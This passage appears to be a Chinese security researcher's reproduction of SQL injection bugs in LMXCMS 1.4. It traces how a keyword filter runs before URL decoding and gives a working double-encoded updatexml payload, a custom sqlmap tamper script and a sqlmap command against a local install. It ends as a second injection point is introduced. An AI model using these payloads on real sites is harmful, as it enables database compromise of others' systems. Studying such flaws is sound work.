一、环境搭建
1、源码下载:http://www.lmxcms.com/down/
2、phpstorm+xdebug调试环境
3、访问 /install 目录安装
4、安装成功后访问:
二、漏洞复现
1、前台TagsAction.class.php存在sql注入漏洞
class TagsAction extends HomeAction{
private $data;
private $tagsModel = null;
public function __construct() {
parent::__construct();
$data = p(2,1,1);
$name = string::delHtml($data['name']);
if(!$name) _404();
$name = urldecode($name);
if($this->tagsModel == null) $this->tagsModel = new TagsModel();
$this->data = $this->tagsModel->getNameData($name);
if(!$this->data) _404();
}
public function index(){
$temModel = new parse($this->smarty,$this->config);
echo $temModel->tags($this->data,$this->tagsModel);
}
}
?>
转到p函数的声明
function p($type=1,$pe=false,$sql=false,$mysql=false){
if($type == 1){
$data = $_POST;
}else if($type == 2){
$data = $_GET;
}else{
$data = $type;
}
if($sql) filter_sql($data);
if($mysql) mysql_retain($data);
foreach($data as $k => $v){
if(is_array($v)){
$newdata[$k] = p($v,$pe,$sql,$mysql);
}else{
if($pe){
$newdata[$k] = string::addslashes($v); // 在每个(',",\,NULL)前添加反斜杠
}else{
$newdata[$k] = trim($v);
}
}
}
return $newdata;
}
get方式,if($sql) filter_sql($data);转到filter_sql过滤函数
//过滤非法提交信息,防止sql注入
function filter_sql(array $data){
foreach($data as $v){
if(is_array($v)){
filter_sql($v);
}else{
//转换小写
$v = strtolower($v);
if(preg_match('/count|create|delete|select|update|use|drop|insert|info|from/',$v)){
rewrite::js_back('【'.$v.'】数据非法');
}
}
}
}
跟踪getNameData函数
//根据Tags名字返回id
public function getNameData($name){
$param['where'] = "name = '$name'";
return parent::oneModel($param);
}
跟踪oneModel函数
//获取一条数据
protected function oneModel($param){
return parent::oneDB($this->tab['0'],$this->field,$param);
}
跟踪oneDB函数
protected function oneDB($tab,Array $field,Array $param){
$field = implode(',',$field);
$force = '';
//强制进入某个索引
if($param['force']) $force = ' force index('.$param['force'].')';
if($param['ignore']) $force = ' ignore index('.$param['ignore'].')';
$We = $this->where($param);
$sql="SELECT ".$field." FROM ".DB_PRE."$tab$force $We limit 1";
//echo $sql;
$result=$this->query($sql);
$data = mysql_fetch_assoc($result);
return $data ? $data : array();
}
访问:http://127.0.0.1/lmxcms1.4/index.php?m=Tags&name=1,输出sql语句为:SELECT * FROM lmx_tags WHERE name = '1' limit 1
传入name参数-->url解码-->filter_sql过滤-->url二次解码
利用方式:payload url编码-->url编码
报错注入:1' and updatexml(0,concat(0x7e,user()),1)#
url编码脚本
# sqlmap/tamper/urlencode.py
import urllib.parse
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
import urllib.parse
def tamper(payload, **kwargs):
"""
对payload进行URL编码的tamper函数。
:param payload: 需要编码的原始payload字符串
:param kwargs: 额外的关键字参数(本函数不使用,但保留以兼容sqlmap的接口)
:return: URL编码后的payload字符串
"""
# 使用urllib.parse.quote进行URL编码,确保参数是字符串类型
if isinstance(payload, str):
encoded_payload = urllib.parse.quote(payload)
enencoded_payload = urllib.parse.quote(encoded_payload)
return enencoded_payload
使用sqlmap:python sqlmap.py -u "http://127.0.0.1/lmxcms1.4/index.php?m=Tags&name=1" -p "name" --proxy "http://127.0.0.1:8080" --tamper=urlencode.py
使用xdebug+phpstorm调试
传入二次url编码后name=%31%27%20%61%6e%64%20%75%70%64%61%74%65%78%6d%6c%28%30%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%75%73%65%72%28%29%29%2c%31%29%23
经过urldecode函数解码后,name=1' and updatexml(0,concat(0x7e,user()),1)#
2、前台SearchAction.class.php存在sql注入漏洞
首页有一个搜索框
搜索后url: